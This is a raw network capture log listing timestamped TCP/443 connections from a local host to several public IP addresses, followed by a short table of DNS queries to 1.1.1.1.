                                                          Jan 9, 2025 21:12:18.257783890 CET49764443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:18.258110046 CET49764443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:18.258121967 CET44349764104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:18.352590084 CET4434976235.190.80.1192.168.2.4
                                                          Jan 9, 2025 21:12:18.353255033 CET49762443192.168.2.435.190.80.1
                                                          Jan 9, 2025 21:12:18.353274107 CET4434976235.190.80.1192.168.2.4
                                                          Jan 9, 2025 21:12:18.354918003 CET4434976235.190.80.1192.168.2.4
                                                          Jan 9, 2025 21:12:18.354975939 CET49762443192.168.2.435.190.80.1
                                                          Jan 9, 2025 21:12:18.356513977 CET49762443192.168.2.435.190.80.1
                                                          Jan 9, 2025 21:12:18.356601000 CET4434976235.190.80.1192.168.2.4
                                                          Jan 9, 2025 21:12:18.356657028 CET49762443192.168.2.435.190.80.1
                                                          Jan 9, 2025 21:12:18.356664896 CET4434976235.190.80.1192.168.2.4
                                                          Jan 9, 2025 21:12:18.410975933 CET49762443192.168.2.435.190.80.1
                                                          Jan 9, 2025 21:12:18.484745026 CET4434976235.190.80.1192.168.2.4
                                                          Jan 9, 2025 21:12:18.484842062 CET4434976235.190.80.1192.168.2.4
                                                          Jan 9, 2025 21:12:18.484905005 CET49762443192.168.2.435.190.80.1
                                                          Jan 9, 2025 21:12:18.485240936 CET49762443192.168.2.435.190.80.1
                                                          Jan 9, 2025 21:12:18.485261917 CET4434976235.190.80.1192.168.2.4
                                                          Jan 9, 2025 21:12:18.485907078 CET49765443192.168.2.435.190.80.1
                                                          Jan 9, 2025 21:12:18.485949993 CET4434976535.190.80.1192.168.2.4
                                                          Jan 9, 2025 21:12:18.486010075 CET49765443192.168.2.435.190.80.1
                                                          Jan 9, 2025 21:12:18.486432076 CET49765443192.168.2.435.190.80.1
                                                          Jan 9, 2025 21:12:18.486450911 CET4434976535.190.80.1192.168.2.4
                                                          Jan 9, 2025 21:12:18.578274965 CET49766443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:18.578335047 CET44349766104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:18.578396082 CET49766443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:18.578645945 CET49766443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:18.578665018 CET44349766104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:18.716655016 CET44349764104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:18.716937065 CET49764443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:18.716960907 CET44349764104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:18.717410088 CET44349764104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:18.717734098 CET49764443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:18.717809916 CET44349764104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:18.717868090 CET49764443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:18.759336948 CET44349764104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:18.843307972 CET44349764104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:18.843513012 CET44349764104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:18.843575001 CET49764443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:18.844041109 CET49764443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:18.844057083 CET44349764104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:18.953228951 CET4434976535.190.80.1192.168.2.4
                                                          Jan 9, 2025 21:12:18.953567028 CET49765443192.168.2.435.190.80.1
                                                          Jan 9, 2025 21:12:18.953603983 CET4434976535.190.80.1192.168.2.4
                                                          Jan 9, 2025 21:12:18.953906059 CET4434976535.190.80.1192.168.2.4
                                                          Jan 9, 2025 21:12:18.954210997 CET49765443192.168.2.435.190.80.1
                                                          Jan 9, 2025 21:12:18.954278946 CET4434976535.190.80.1192.168.2.4
                                                          Jan 9, 2025 21:12:18.954448938 CET49765443192.168.2.435.190.80.1
                                                          Jan 9, 2025 21:12:18.995333910 CET4434976535.190.80.1192.168.2.4
                                                          Jan 9, 2025 21:12:19.051107883 CET44349766104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:19.051393986 CET49766443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:19.051418066 CET44349766104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:19.051923990 CET44349766104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:19.052580118 CET49766443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:19.052681923 CET44349766104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:19.052731991 CET49766443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:19.079622984 CET4434976535.190.80.1192.168.2.4
                                                          Jan 9, 2025 21:12:19.079804897 CET4434976535.190.80.1192.168.2.4
                                                          Jan 9, 2025 21:12:19.079921961 CET49765443192.168.2.435.190.80.1
                                                          Jan 9, 2025 21:12:19.079957962 CET49765443192.168.2.435.190.80.1
                                                          Jan 9, 2025 21:12:19.079981089 CET4434976535.190.80.1192.168.2.4
                                                          Jan 9, 2025 21:12:19.080024958 CET49765443192.168.2.435.190.80.1
                                                          Jan 9, 2025 21:12:19.080024958 CET49765443192.168.2.435.190.80.1
                                                          Jan 9, 2025 21:12:19.095330000 CET44349766104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:19.099457026 CET49766443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:19.211787939 CET44349766104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:19.211855888 CET44349766104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:19.211963892 CET49766443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:19.213052988 CET49766443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:19.213078022 CET44349766104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:19.216999054 CET49767443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:19.217099905 CET44349767104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:19.217540026 CET49767443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:19.218010902 CET49767443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:19.218053102 CET44349767104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:19.551480055 CET49768443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:19.551518917 CET44349768104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:19.551579952 CET49768443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:19.551817894 CET49768443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:19.551824093 CET44349768104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:19.710510015 CET44349767104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:19.711076021 CET49767443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:19.711124897 CET44349767104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:19.711669922 CET44349767104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:19.712061882 CET49767443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:19.712166071 CET44349767104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:19.712193012 CET49767443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:19.757935047 CET49767443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:19.757961035 CET44349767104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:19.863015890 CET44349767104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:19.863178968 CET44349767104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:19.863240004 CET49767443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:19.870121956 CET49767443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:19.870157003 CET44349767104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:20.065550089 CET44349768104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:20.122332096 CET49768443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:20.154330969 CET49768443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:20.154350996 CET44349768104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:20.155884027 CET44349768104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:20.158865929 CET49768443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:20.159056902 CET44349768104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:20.159363031 CET49768443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:20.203339100 CET44349768104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:20.408843994 CET44349768104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:20.409068108 CET44349768104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:20.409116030 CET49768443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:20.409137011 CET44349768104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:20.409213066 CET44349768104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:20.409261942 CET49768443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:20.409704924 CET49768443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:20.409714937 CET44349768104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:20.726747990 CET49769443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:20.726862907 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:20.726943016 CET49769443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:20.727381945 CET49769443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:20.727422953 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.221296072 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.221807003 CET49769443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:21.221848011 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.222970963 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.223542929 CET49769443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:21.223542929 CET49769443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:21.223567963 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.223628998 CET49769443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:21.223683119 CET49769443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:21.223737001 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.223927021 CET49769443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:21.223994017 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.517875910 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.518001080 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.518085957 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.518170118 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.518208981 CET49769443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:21.518235922 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.518311024 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.518326998 CET49769443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:21.518335104 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.518429041 CET49769443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:21.518435001 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.519084930 CET49769443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:21.519089937 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.522542000 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.522624016 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.522718906 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.522914886 CET49769443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:21.522923946 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.568780899 CET49769443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:21.609591961 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.610761881 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.610852957 CET49769443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:21.610914946 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.611030102 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.611212969 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.611253977 CET49769443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:21.611274958 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.611385107 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.611552954 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.611589909 CET49769443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:21.611768007 CET49769443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:21.612014055 CET49769443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:21.612046957 CET44349769104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.629412889 CET49770443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:21.629467010 CET44349770104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.629657030 CET49770443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:21.629869938 CET49770443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:21.629883051 CET44349770104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:21.749907970 CET44349738142.250.74.196192.168.2.4
                                                          Jan 9, 2025 21:12:21.749988079 CET44349738142.250.74.196192.168.2.4
                                                          Jan 9, 2025 21:12:21.750140905 CET49738443192.168.2.4142.250.74.196
                                                          Jan 9, 2025 21:12:22.222039938 CET44349770104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:22.222409010 CET49770443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:22.222440004 CET44349770104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:22.223750114 CET44349770104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:22.227684021 CET49770443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:22.227785110 CET44349770104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:22.228646040 CET49770443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:22.271341085 CET44349770104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:22.299930096 CET49738443192.168.2.4142.250.74.196
                                                          Jan 9, 2025 21:12:22.299962044 CET44349738142.250.74.196192.168.2.4
                                                          Jan 9, 2025 21:12:22.619357109 CET44349770104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:22.619456053 CET44349770104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:22.619544983 CET49770443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:22.632076025 CET49770443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:22.632101059 CET44349770104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:28.830271959 CET49771443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:28.830369949 CET44349771104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:28.830440044 CET49771443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:28.830698013 CET49771443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:28.830739021 CET44349771104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:29.339402914 CET44349771104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:29.341358900 CET49771443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:29.341425896 CET44349771104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:29.342041969 CET44349771104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:29.345001936 CET49771443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:29.345105886 CET44349771104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:29.345266104 CET49771443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:29.345387936 CET49771443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:29.345432043 CET44349771104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:29.345550060 CET49771443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:29.345597982 CET44349771104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:29.616621017 CET44349771104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:29.616822958 CET44349771104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:29.616898060 CET44349771104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:29.616944075 CET49771443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:29.616974115 CET44349771104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:29.617012978 CET49771443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:29.617019892 CET44349771104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:29.617100954 CET44349771104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:29.618100882 CET49771443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:29.618112087 CET44349771104.18.95.41192.168.2.4
                                                          Jan 9, 2025 21:12:29.618138075 CET49771443192.168.2.4104.18.95.41
                                                          Jan 9, 2025 21:12:29.624164104 CET49772443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:29.624202013 CET44349772104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:29.625025988 CET49772443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:29.625349998 CET49772443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:29.625365973 CET44349772104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:29.838608027 CET49773443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:29.838649035 CET44349773172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:12:29.838720083 CET49773443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:29.839167118 CET49773443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:29.839189053 CET44349773172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:12:30.084302902 CET44349772104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:30.084633112 CET49772443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:30.084665060 CET44349772104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:30.085445881 CET44349772104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:30.085824013 CET49772443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:30.085901976 CET44349772104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:30.086154938 CET49772443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:30.127337933 CET44349772104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:30.242341042 CET44349772104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:30.242511034 CET44349772104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:30.242815971 CET49772443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:30.243771076 CET49772443192.168.2.4104.18.94.41
                                                          Jan 9, 2025 21:12:30.243791103 CET44349772104.18.94.41192.168.2.4
                                                          Jan 9, 2025 21:12:30.314527035 CET44349773172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:12:30.314769983 CET49773443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:30.314799070 CET44349773172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:12:30.316239119 CET44349773172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:12:30.316298962 CET49773443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:30.317610025 CET49773443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:30.317651987 CET49773443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:30.317704916 CET44349773172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:12:30.317725897 CET49773443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:30.317750931 CET49773443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:30.318169117 CET49774443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:30.318207026 CET44349774172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:12:30.318267107 CET49774443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:30.318567038 CET49774443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:30.318577051 CET44349774172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:12:30.785798073 CET44349774172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:12:30.786093950 CET49774443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:30.786108971 CET44349774172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:12:30.787734032 CET44349774172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:12:30.787847042 CET49774443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:30.789190054 CET49774443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:30.789272070 CET44349774172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:12:30.789422035 CET49774443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:30.789429903 CET44349774172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:12:30.832797050 CET49774443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:31.412209034 CET44349774172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:12:31.412468910 CET44349774172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:12:31.412589073 CET49774443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:31.415332079 CET49774443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:31.415349007 CET44349774172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:12:31.570271969 CET49777443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:31.570318937 CET44349777172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:12:31.570380926 CET49777443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:31.570827007 CET49777443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:31.570836067 CET44349777172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:12:32.062990904 CET44349777172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:12:32.063329935 CET49777443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:32.063369989 CET44349777172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:12:32.066492081 CET44349777172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:12:32.066560030 CET49777443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:32.068036079 CET49777443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:32.068160057 CET44349777172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:12:32.068187952 CET49777443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:32.111340046 CET44349777172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:12:32.112407923 CET49777443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:32.112421989 CET44349777172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:12:32.159034014 CET49777443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:32.637758970 CET44349777172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:12:32.637886047 CET44349777172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:12:32.639513016 CET49777443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:32.641041040 CET49777443192.168.2.4172.67.195.229
                                                          Jan 9, 2025 21:12:32.641061068 CET44349777172.67.195.229192.168.2.4
                                                          Jan 9, 2025 21:13:04.035861969 CET4972480192.168.2.4199.232.214.172
                                                          Jan 9, 2025 21:13:04.040868044 CET8049724199.232.214.172192.168.2.4
                                                          Jan 9, 2025 21:13:04.040934086 CET4972480192.168.2.4199.232.214.172
                                                          Jan 9, 2025 21:13:11.295994043 CET49924443192.168.2.4142.250.74.196
                                                          Jan 9, 2025 21:13:11.296050072 CET44349924142.250.74.196192.168.2.4
                                                          Jan 9, 2025 21:13:11.296381950 CET49924443192.168.2.4142.250.74.196
                                                          Jan 9, 2025 21:13:11.297142029 CET49924443192.168.2.4142.250.74.196
                                                          Jan 9, 2025 21:13:11.297162056 CET44349924142.250.74.196192.168.2.4
                                                          Jan 9, 2025 21:13:11.930645943 CET44349924142.250.74.196192.168.2.4
                                                          Jan 9, 2025 21:13:11.931065083 CET49924443192.168.2.4142.250.74.196
                                                          Jan 9, 2025 21:13:11.931085110 CET44349924142.250.74.196192.168.2.4
                                                          Jan 9, 2025 21:13:11.931571007 CET44349924142.250.74.196192.168.2.4
                                                          Jan 9, 2025 21:13:11.931926966 CET49924443192.168.2.4142.250.74.196
                                                          Jan 9, 2025 21:13:11.932012081 CET44349924142.250.74.196192.168.2.4
                                                          Jan 9, 2025 21:13:11.973630905 CET49924443192.168.2.4142.250.74.196
                                                          Jan 9, 2025 21:13:21.834063053 CET44349924142.250.74.196192.168.2.4
                                                          Jan 9, 2025 21:13:21.834109068 CET44349924142.250.74.196192.168.2.4
                                                          Jan 9, 2025 21:13:21.834394932 CET49924443192.168.2.4142.250.74.196
                                                          Jan 9, 2025 21:13:22.288156033 CET49924443192.168.2.4142.250.74.196
                                                          Jan 9, 2025 21:13:22.288186073 CET44349924142.250.74.196192.168.2.4
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 9, 2025 21:12:07.729762077 CET53537901.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:07.784436941 CET53516121.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:08.766750097 CET53524041.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:11.180063009 CET6353053192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:11.180236101 CET6339153192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:11.187069893 CET53635301.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:11.187246084 CET53633911.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:13.057625055 CET6458853192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:13.059463978 CET5626553192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:13.150459051 CET53645881.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:13.158360004 CET53562651.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:13.160763979 CET6282153192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:13.160913944 CET5702053192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:13.168622017 CET53628211.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:13.361996889 CET53570201.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:14.251019955 CET6514653192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:14.251960993 CET6515853192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:14.252516031 CET6074453192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:14.252981901 CET5578553192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:14.253344059 CET5982153192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:14.253501892 CET6073153192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:14.257709026 CET53651461.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:14.259121895 CET53607441.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:14.259133101 CET53651581.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:14.260330915 CET53557851.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:14.260447979 CET53598211.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:14.262026072 CET53607311.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:14.982697010 CET5853653192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:14.982880116 CET5790253192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:14.990209103 CET53585361.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:14.990340948 CET53579021.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:15.132025957 CET5073853192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:15.132225990 CET6195153192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:15.138890028 CET53619511.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:15.139547110 CET53507381.1.1.1192.168.2.4
